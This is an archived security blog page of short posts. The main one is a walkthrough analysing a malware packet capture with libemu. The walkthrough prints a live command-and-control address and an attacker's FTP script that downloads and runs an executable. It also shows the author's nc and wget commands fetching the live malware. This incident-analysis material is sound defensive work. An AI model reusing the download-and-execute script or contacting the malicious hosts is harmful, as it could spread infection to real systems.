
  • admin 9:31 pm on 3 October, 2009

    Cyber war defense 

    Recent news has all been bragging about every major country starting “cyber war” initiatives: USA, UK…

    Elite Military Hacker Squad Would Stop Wars With Bits, Not Bombs

    Efforts to drag our military’s cybersecurity into the 21st century are well underway, but John Arquilla, professor at the Naval Postgraduate School, wants more: A preemptive international hacker force, which would cripple enemies before they even become a problem.” (More …)

     
  • admin 9:16 pm on 2 February, 2009

    Good example of employee awareness test/training 

    There’s an interesting story I read today as part of my daily RSS follow.
    The US Department of Justice (DOJ) conducts regular employee security awareness tests. The most recent one was a 2-day e-mail hoax, fishing potentially sensitive information out of their employees.
    There are several good things about that:
    1 – People get trained the best way possible: by experience.
    2 – If somebody gives the information out, it does not leave the organization.
    3 – Knowing that they might be tested and lose “points” if they fail to stay alert, people will actually be cautious most of the time…

    They have been doing this for the last 3 years – when will you start?

    If you want to read the full story – http://news.cnet.com/8301-1009_3-10153795-83.html

     
  • admin 5:34 pm on 25 January, 2009

    Playing With Authenticode and MD5 Collisions 

    I will not post the whole post, as it is not my invention nor my labor, but I can’t pass without posting it… the work is so fascinating, it bugs my mind why nobody thought of this when designing the signing process. Like, the possibility of MD5 collisions has been there for a few years… and I’m more than sure the guys at M$ knew of the issue, but preferred to keep silent about it, hoping it would pass unnoticed… well, it didn’t.

    What are they gonna do about it now?

    http://blog.didierstevens.com/2009/01/17/playing-with-authenticode-and-md5-collisions/

     
  • admin 3:10 pm on 19 January, 2009

    Analyze malware packet captures 

    Say you have captured suspicious malware traffic, but don’t know what to do with it.

    An example: shellcode

    The obvious questions to ask in view of such an attack are “what are they trying to do” and “was it successful”. To help you answer these questions next time you find yourself on the receiving end of something like this, here’s a quick walk-through of how we went about coming up with the answers.

    1. Prune the capture to remove the part that is “filler” (i.e. all the kkkkllllll in the capture shown).

    2. Convert the remaining capture into a binary file.  Here’s how I do it:

    cat a.txt | cut -b 11-58 | perl -pe 's/(..)\s+/chr(hex($1))/ge' > a.bin

    The “cut” command strips out the address to the left and the printed characters to the right, and only leaves the hex codes, which are then converted by the perl instruction into single-byte characters and written into a file that I called “a.bin”.

    3. Next, use the “sctest” tool of libemu to try and make sense of the code block. Libemu doesn’t always work on such code, but IF it works, it does such a stellar job that I always try libemu/sctest first before loading the code into OllyDbg or objdump for manual analysis. In this case, we’re lucky: sctest makes quick work of the code, and we see that the “connect” function of WinSock is used to establish an outbound TCP connection on port 78.

    $sctest -Sgs 10000 < a.bin
    success offset = 0x00000031
    Hook me Captain Cook!
    userhooks.c:127 user_hook_ExitThread
    ExitThread(0)
    stepcount 8189
    [....]
    DWORD dwProcessId = 4712;
    DWORD dwThreadId = 4714;
    };
    ) =  -1;
    int connect (
    SOCKET s = 66;
    struct sockaddr_in * name = 0x0041714a =>
    struct   = {
    short sin_family = 2;
    unsigned short sin_port = 19968 (port=78);
    struct in_addr sin_addr = {
    unsigned long s_addr = 118898138 (host=218.61.22.7);
    };
    char sin_zero = "       ";
    };
    int namelen = 16;

    [...]

    4. Let’s connect to the address and port that libemu so nicely revealed… and lookie, we get an FTP script that downloads and starts an EXE from 3322.orrrg (org changed to orrrg to keep you from clicking :)

    $nc 218.61.22.7 78
    echo open a528.3322.orrrg>1.txt
    echo 2967>>1.txt
    echo 2967>>1.txt
    echo binary>>1.txt
    echo get 2967.exe>>1.txt
    echo bye>>1.txt
    ftp -s:1.txt
    2967.exe
    2967.exe
    2967.exe
    del 1.txt
    exit
    ^C

    5. Next, we fetch the malware manually

    $wget "ftp://2967:2967@a528.3322.orrrg/2967.exe"
    [....]

    6. Lastly, we analyze 2967.exe with tools like VirusTotal (result) and ThreatExpert (result).

    Thus, if this had been directed at a server of yours, you would now check the firewall log (IDS, flow log, etc.) for an outbound connection attempt to port 78. If nothing is found, the exploit wasn’t successful. If you see the connection to port 78 and it went through (for example because you allow all ports outbound), the next step is to check for the FTP transfer. If the FTP completed as well, you know it is time to rebuild that server.

    And yes, adding the 3322-dot-org domain to your block list would be a good idea. As you can tell from this diary that we published in 2007, it is by far not the first time that this domain shows up on our malware radar … and the ThreatExpert report included above contains yet another reason to zap this domain and all its subdomains.

    Careful: All the baddies are still live at this time, shoot your foot at your own risk.
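    As an added example (not from the diary or this blog), the script below does the step 2 conversion in Python and then decodes the sockaddr_in that libemu printed in step 3, showing where the raw numbers 19968 and 118898138 come from: libemu prints the network-byte-order fields as little-endian integers. The hex dump it parses is constructed here, not the original capture; it assumes the same column layout the diary’s “cut -b 11-58” relies on.

```python
import struct
import socket

# Constructed sample dump (not the diary's capture): 8-char offset, two spaces,
# 16 hex pairs (columns 11-58), then the printable column. Offset 8 holds a
# sockaddr_in for 218.61.22.7:78, preceded by "kkkkllll" filler.
SAMPLE_DUMP = """\
00000000  6b 6b 6b 6b 6c 6c 6c 6c 02 00 00 4e da 3d 16 07  kkkkllll...N.=..
00000010  00 00 00 00 00 00 00 00 90 90 90 90 90 90 90 90  ................
"""


def dump_to_bytes(dump_text: str) -> bytes:
    """Python equivalent of `cut -b 11-58 | perl -pe 's/(..)\\s+/chr(hex($1))/ge'`:
    keep only the hex column of each line and turn each pair into one byte."""
    out = bytearray()
    for line in dump_text.splitlines():
        hex_col = line[10:58]          # 1-indexed columns 11..58
        out.extend(int(pair, 16) for pair in hex_col.split())
    return bytes(out)


def decode_sockaddr_in(blob: bytes, off: int) -> dict:
    """Decode the 16-byte sockaddr_in at `off`, reporting both the raw
    little-endian values (as libemu prints them) and the real host/port."""
    family, port_raw = struct.unpack_from("<HH", blob, off)   # e.g. 2, 19968
    (addr_raw,) = struct.unpack_from("<I", blob, off + 4)     # e.g. 118898138
    (port,) = struct.unpack_from("!H", blob, off + 2)         # network order -> 78
    return {
        "family": family,
        "sin_port_raw": port_raw,
        "port": port,
        "s_addr_raw": addr_raw,
        "host": socket.inet_ntoa(blob[off + 4:off + 8]),
    }


def find_sockaddr_in(blob: bytes) -> list:
    """Heuristic static scan for sockaddr_in constants: AF_INET (02 00), a
    non-zero port and address, and an all-zero 8-byte sin_zero pad.
    Caveat: shellcode often builds the struct on the stack with push
    instructions, so nothing contiguous may exist; that is why emulation
    (libemu) is the first choice and this scan is only a cheap fallback."""
    hits = []
    for off in range(0, len(blob) - 15):
        if blob[off:off + 2] == b"\x02\x00" and blob[off + 8:off + 16] == bytes(8):
            info = decode_sockaddr_in(blob, off)
            if info["port"] and info["s_addr_raw"]:
                hits.append((off, info))
    return hits
```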

     
  • admin 10:17 am on 9 January, 2009

    How to Suck at Information Security 

    The following list presents common information security mistakes and misconceptions, so you can avoid making them.

    Security Policy and Compliance

    • Ignore regulatory compliance requirements.
    • Assume the users will read the security policy because you’ve asked them to.
    • Use security templates without customizing them.
    • Jump into a full-blown adoption of frameworks such as ISO 27001/27002 before you’re ready.
    • Create security policies you cannot enforce. (More …)
     
  • admin 10:49 pm on 4 September, 2008

    False safety of outsourced IT 

    No matter how much of your IT is outsourced, you have the feeling that the data at the datacenter is secure. Your databases and storage, sometimes your Active Directory and other servers, are there. They are secure – the procedures to protect your data are usually tough to bypass, and few attackers are brave and smart (or stupid?) enough to try their luck there.

    However, that is not what matters.

    When somebody attacks you, they will attack your infrastructure, not the one at the datacenter. People bend much more easily than equipment, and are much more susceptible to defeat. In fact, who will spend the time breaking through tens of firewalls and protections at the datacenter, when they could bypass a single (or dual) firewall and get straight into the heart of your company?

    New strategy. Before protecting your firewall and your DMZ (I already said in a previous post that the DMZ is useless) – protect your client computers. Yes, build your network with firewalls first, DMZ second, then the internal network and finally client computers – but start protecting your network in depth *from* the client computers, outwards. If your accountant uses Excel, Word and PowerPoint in their work, do not allow them to run Firefox or Skype! Do not give them higher than Guest permissions on their computer! They want to install the latest screensaver? Fine, let them do it at home. No playtime on the company computer network.

    Your system administrators, of course, need to work as administrators of their own computers. WRONG! Guest, and Run As when needed.

    The CEO needs full access to his computer, of course! … ? – NO! Guest permissions. Unless he signs a document that he is ready to take responsibility for leaking confidential information from his computer, to the internet.

    Think about it, and the logic will become clear. Leave one link weak, leave a microscopic opening in your security – it *will* be used against you, sooner or later. Make sure you’re not responsible for it: do your job and secure things as well as you can.

     
  • admin 6:02 pm on 22 July, 2008

    Most Important Thing About Security 

    What’s the most important part of OS security?

    The user. It’s always the user. I’d rather have a smart user running as administrator on a Windows computer with no firewall, no anti-virus, and no anti-spyware than a dumb user running as a limited user on an Ubuntu computer with a firewall, anti-virus, and a rootkit detector. Dumb users click on anything, somehow manage to install untrustworthy software even without administrative privileges, and use easy-to-guess passwords. More …

     